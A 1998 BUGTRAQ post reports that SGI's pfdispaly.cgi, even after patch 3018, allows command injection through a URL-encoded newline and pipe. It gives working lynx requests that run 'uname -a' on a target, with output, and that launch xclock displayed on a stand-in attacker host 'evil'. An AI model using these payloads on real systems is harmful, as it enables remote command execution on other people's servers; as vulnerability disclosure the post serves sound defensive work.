Date: Tue, 7 Apr 1998 03:16:01 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: perfomer_tools again
Hi
There is already a patch from SGI to the pfdispaly.cgi
'../..' bug.
But it seems it fixes only that problem, without checking
the rest of the code for similar vulnerabilities, so even
after patch 3018 (04/01/98) you can try:
$ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
uname -a\| file
IRIX victim 6.2 03131015 IP22
or
$ lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'
(You probably will notice this exploit is similar to that
one on 'wrap'; it's nice to find that sometimes reusing
code does work)
The fix is easy (for this particular problem); so it's left
to the reader.
Anyway, if you're using SGI cgi's you should consider
limiting the access to your domain...
--
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)